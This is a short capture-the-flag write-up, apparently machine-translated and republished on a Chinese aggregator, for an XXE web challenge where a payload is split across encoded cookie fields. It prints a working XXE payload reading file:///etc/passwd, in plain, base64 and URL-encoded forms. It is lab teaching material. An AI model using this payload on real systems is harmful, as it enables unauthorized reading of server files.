当前位置:网站首页>Primary school, session 3 - afternoon: Web_ xxe
Primary school, session 3 - afternoon: Web_ xxe
2022-06-30 19:50:00 【Part 02】
hint:
1.cookie
2. the base64 code
Grab the bag and check Cookie, Different from the usual , Yes version, bracket, bracket2
bracket2 the URL encryption , Come back
base64 After decoding , You can see the order of the three
The order should be bracket+version+bracket2
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
Code the written statement
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgQU5ZIFs8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg==
URL code
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgQU5ZIFs8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg%3D%3D
Take three sections and put them in corresponding positions
&xxe;
URL code
%26xxe%3B
Need to call xxe, Find the point that can be called
stay email Can successfully call
Repeat the above method to find flag
边栏推荐
- 十分之坑,tar命令解压文件的时候竟然不能解析英文括号“()”
- WordPress 博客使用火山引擎 veImageX 进行静态资源 CDN 加速(免费)
- MQ advantages and disadvantages (2022.5.2-5.8)
- 科大讯飞活跃竞赛汇总!(12个)
- Wechat applets - basics takes you to understand the life cycle of applets (2)
- 为什么数字化转型战略必须包括持续测试?
- WeakSet
- KubeVela 1.4:让应用交付更安全、上手更简单、过程更透明
- #夏日挑战赛#【FFH】HarmonyOS手机遥控Dayu开发板相机
- Alibaba Tianchi SQL training camp learning notes 5
猜你喜欢
无线充U型超声波电动牙刷方案开发
企业中通过组策略管理Edge浏览器设置(IE模式、主页绑定等)
Promise从认识到使用
4.3-inch touch screen 12 channel control port programmable network central control supports mutual backup of 5 central control hosts
力扣------统计包含给定前缀的字符串
6-1漏洞利用-FTP漏洞利用
VR全景拍摄为什么要加盟?巧借资源实现共赢
1. 爬虫之Beautifulsoup解析库&在线解析图片验证码
Safe holidays without holidays, VR traffic makes children travel safely | Guangzhou Sinovel viewpoint
笔记软件的历史、选择策略以及深度评测
随机推荐
The former king of fruit juice sold for 1.6 billion yuan
SM2246EN+闪迪15131
【1175. 质数排列】
Growth summer challenge is coming, exclusive community welfare is coming ~ get CSDN customized T-shirt for free
Abaqus 2022软件安装包和安装教程
MQ component (2022.5.16-5.22)
如何使用robots.txt及其详解
qt中toLocal8Bit和toUtf8()有什么区别
JVM FAQs
VR全景添加对比功能,让差异化效果展示更直观!
线上线下双结合,VR全景是家具线上转型好方法!
企业中台规划和IT架构微服务转型
Smarter! Airiot accelerates the upgrading of energy conservation and emission reduction in the coal industry
The prospectus of pelt medical was "invalid" for the second time in the Hong Kong stock exchange, and the listing plan was substantially delayed
毕业季职场人
派尔特医疗在港交所招股书二次“失效”,上市计划实质性延迟
SQL continuous login problem
Taiwan SSS Xinchuang sss1700 replaces cmedia cm6533 24bit 96KHz USB audio codec chip
Ten percent of the time, the tar command can't parse the English bracket "()" when decompressing the file
力扣------统计包含给定前缀的字符串